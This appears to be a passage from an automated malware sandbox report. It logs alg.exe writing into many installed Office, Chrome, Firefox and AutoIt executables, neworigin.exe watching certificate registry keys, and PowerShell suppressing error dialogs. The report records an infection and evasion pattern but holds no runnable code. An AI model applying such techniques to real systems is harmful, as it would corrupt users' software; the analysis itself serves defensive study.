Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 5848064	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 3286540	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 185344	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 758860	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 758784	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 151349	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 26954240	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 27527756	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 27527680	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 11401068	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 4392960	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 4966476	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 4966400	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 2843313	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 1576448	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 2149964	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 2149888	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 574636	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 4318208	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 4891724	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 4891648	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 1700540	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 4318208	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 4891724	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 4891648	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 1700540	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 1404928	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 1978444	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 1978368	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 633260	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 1199616	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 1773132	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 1773056	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 513116	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 248832	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 822348	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 822272	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 121980	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 707072	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 1280588	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 1280512	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 346881	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 666112	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 1239628	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 1239552	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 193089	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 228352	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 801868	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 801792	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 43297	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 762368	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 1335884	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 1335808	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 239297	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 70144	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 643660	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 643584	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 32241	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 279040	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 852556	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 852480	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 111633	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 55296	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 628812	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 628736	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 4108	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 403968	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 977484	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 977408	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 79009	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 224256	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 797772	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 797696	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 35826	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Info.exe offset: 0	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Users\user\Desktop\RJKUWSGxej.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
